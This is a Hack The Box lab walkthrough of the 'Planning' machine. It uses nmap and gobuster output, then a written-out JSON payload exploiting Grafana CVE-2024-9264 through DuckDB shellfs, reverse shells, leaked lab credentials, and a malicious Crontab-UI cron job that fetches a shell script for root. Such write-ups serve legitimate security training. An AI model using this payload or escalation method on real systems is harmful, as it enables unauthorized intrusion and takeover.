LoginHack The Box: Planning Machine Walkthrouh β Easy Diffucilty
Introduction to Planning:
In this write-up, we will explore the βPlanningβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βPlanningβ machine from Hack The Box by achieving the following objectives:
User Flag:
During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264βa critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user βenzo,β which granted SSH access to the host system.
Root Flag:
Once on the host, I discovered the Crontab-UI serviceβa web-based tool for managing cron jobsβrunning on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the βenzoβ user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.68Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/planning]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.68
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
ββ[dark@parrot]β[~/Documents/htb/planning]
ββββΌ $Analysis:
- Port 22 (SSH): Secure Shell service for remote access.
- Port 80 (HTTP): Web server running Apache.
Web Application Exploration:
The website for Edukate appears to be a standard educational platform.
What is Edukate?
Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.
Source: themewagon/Edukate
No usable elements are present here.
Nothing noteworthy here either.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50Gobuster Output:
ββ[dark@parrot]β[/opt/SecLists/Discovery/DNS]
ββββΌ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://planning.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: combined_subdomains.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
ββ[dark@parrot]β[/opt/SecLists/Discovery/DNS]
ββββΌ $
Analysis:
Discovery: grafana.planning.htb
- Gobuster found a valid virtual host:
grafana.planning.htb. - This is likely an internal service meant for the organizationβs team, not a public endpoint.
- Since it contains
grafana, it strongly suggests it is a Grafana dashboard instance.
Grafana Application
The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.
We should be able to log in using the credentials provided by Hack The Box.
- Username:Β admin
- Password: 0D5oT70Fq13EvB5r
We need to inspect the traffic using Burp Suite.
First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.
We successfully gained access to the Grafana dashboard.
We also confirmed that the Grafana instance is running version 11.0.0
There are numerous tokens being rotated here.
This is what the response looks like in Burp Suite.
Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE
This vulnerability targets Grafana 11βs experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isnβt properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).
Grafana doesnβt include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafanaβs PATH. If itβs absent, the system is safe.
Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.
Letβs search Google for potential exploits targeting Grafana v11.0.0
This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nolliumβs GitHub repository.
We successfully retrieved the /etc/passwd file.
When we ran the whoami command, it returned root, which is unexpected.
Letβs set up our listener.
Unfortunately, we were unable to execute the command due to an error.
As suspected, this is running inside a Docker container.
The environment variables reveal the Grafana admin credentials:
GF_SECURITY_ADMIN_USER=enzo-
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.
Exploit CVE-2024-9264 using Burp Suite.
The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.
If the full path is not specified, it responds with a βNot Foundβ message.
However, attempting to execute the full path results in an βUnauthorizedβ response.
Itβs still the same; we need to send the JSON data here.
After replacing the token, it worked.
{
"from": "1729313027261",
"queries": [
{
"datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
"expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
"hide": false,
"refId": "B",
"type": "sql",
"window": ""
}
],
"to": "1729334627261"
}This JSON payload is a crafted query sent to Grafanaβs api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.
Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.
Letβs set up our listener to catch the reverse shell.
Use this SQL command to execute the bash script.
Itβs hanging, which is a good sign that the payload is executing.
We successfully received a reverse shell connection.
We attempted to switch to the enzo user with su enzo, but it didnβt work.
SSH worked perfectly and allowed us to log in successfully.
We were able to read the user flag by running cat user.txt.
Escalate To Root Privileges Access
Privilege Escalation:
Locate the database file.
We discovered /opt/crrontabs/crontab.db.
The password for root_grafana is P4ssw0rdS0pRi0T3c.
Port 8000 is open here, which is unusual.
Letβs set up port forwarding for port 8000.
We need to provide the credentials to log in.
We need to use the credentials we discovered earlier to log in.
It turned out to be a cron jobs management interface.
What is Cronjob-UI?
Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.
We need to create a new cron job command.
The shell.sh file contains the reverse shell that will connect back to us.
We will use curl to fetch the file, as demonstrated earlier.
The file was transferred successfully, as expected.
We were able to access the root shell and read the root flag by running cat root.txt.
The post Hack The Box: Planning Machine Walkthrouh β Easy Diffucilty appeared first on Threatninja.net.
